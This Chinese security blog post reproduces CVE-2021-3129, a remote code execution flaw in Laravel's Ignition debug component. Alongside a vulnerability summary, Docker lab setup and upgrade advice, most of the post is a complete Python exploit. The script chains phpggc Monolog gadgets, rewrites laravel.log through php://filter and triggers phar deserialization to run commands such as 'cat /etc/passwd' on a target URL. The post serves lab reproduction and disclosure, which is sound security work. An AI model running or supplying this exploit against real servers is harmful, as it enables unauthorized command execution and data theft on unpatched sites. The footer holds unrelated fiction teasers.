2021-01-29CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

一、漏洞简介

Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。

Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

二、影响版本

Laravel <= 8.4.2

Ignition <2.5.2

三、环境准备&漏洞复现

环境地址:

环境和exp下载:后台回复 “CVE-2021-3129” 下载即可

或者下面下载:https://github.com/SNCKER/CVE-2021-3129

执行

docker-compse up -d

访问8888端口即可

访问地址:http://127.0.0.1:8888

漏洞复现:

1、在下载GitHub上下载的docker环境中带有exp,使用此exp需要下载phpggc

2、把exp和phpggc放在同一目录,使用python3执行exp,可以看到执行了exp里命令

Macos执行报错

切换kali环境执行命令:

修改脚本添加参数:

环境和exp下载:后台回复 “CVE-2021-3129” 下载即可

py脚本code

#!/usr/bin/python3

import requests as req

import os, uuid

class Exp:

    __gadget_chains = {

        "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

        "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

        "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",

    }  # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力

    __delimiter_len = 8  # 定界符长度

    def __vul_check(self):

        resp = req.get(self.__url, verify=False)

        if resp.status_code != 405 and "laravel" not in resp.text:

            return False

        return True

    def __payload_send(self, payload):

        header = {

            "Accept": "application/json"

        }

        data = {

            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",

            "parameters": {

                "variableName": "cve20213129",

                "viewFile": ""

            }

        }

        data["parameters"]["viewFile"] = payload

        resp = req.post(self.__url, headers=header, json=data, verify=False)

        # print(resp.text)

        return resp

    def __command_handler(self, command):

        """

        因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。

        """

        self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len]  # 定界符用于定位页面中命令执行结果的位置。

        # print(delimiter)

        command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)

        # print(command)

        escaped_chars = [' ', '&', '|']  # 我只想到这么多,可自行添加。

        for c in escaped_chars:

            command = command.replace(c, '\\' + c)

        # print(command)

        return command

    def __clear_log(self):

        return self.__payload_send(

            "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __gen_payload(self, gadget_chain):

        gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)

        # print(gen_shell)

        os.system(gen_shell)

        with open('payload.txt', 'r') as f:

            payload = f.read().replace('\n', '') + 'a'  # 添加一个字符使得两个完整的payload总是只有一个可以正常解码

        os.system("rm payload.txt")

        # print(payload)

        return payload

    def __decode_log(self):

        return self.__payload_send(

            "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __unserialize_log(self):

        return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")

    def __rce(self):

        text = self.__unserialize_log().text

        # print(text)

        echo_find = text.find(self.__delimiter)

        # print(echo_find)

        if echo_find >= 0:

            return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]

        else:

            return "[-] RCE echo is not found."

    def exp(self):

        for gadget_chain in self.__gadget_chains.keys():

            print("[*] Try to use %s for exploitation." % (gadget_chain))

            self.__clear_log()

            self.__clear_log()

            self.__payload_send('a' * 2)

            self.__payload_send(self.__gen_payload(gadget_chain))

            self.__decode_log()

            print("[*] Result:")

            print(self.__rce())

    def __init__(self, target, command):

        self.target = target

        self.__url = req.compat.urljoin(target, "_ignition/execute-solution")

        self.__command = self.__command_handler(command)

        if not self.__vul_check():

            print("[-] [%s] is seems not vulnerable." % (self.target))

            print("[*] You can also call obj.exp() to force an attack.")

        else:

            self.exp()

def main():

    Exp("http://127.0.0.1:8888", "cat /etc/passwd")

if __name__ == '__main__':

    main()

四、安全建议

建议将 Laravel 框架升级至8.4.3及以上版本,或将 Ignition组件升级至 2.5.2 及以上版本。

下载链接:

https://laravel.com/docs/8.x#laravel-the-fullstack-framework

参考:

https://mp.weixin.qq.com/s/ShRvF_YeV9JbJJnOUjklCw

https://github.com/SNCKER/CVE-2021-3129

https://www.venustech.com.cn/new_type/aqtg/20210114/22299.html

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,937评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,503评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,712评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,668评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,677评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,601评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,975评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,637评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,881评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,621评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,710评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,387评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,971评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,947评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,189评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,805评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,449评论 2 342

推荐阅读更多精彩内容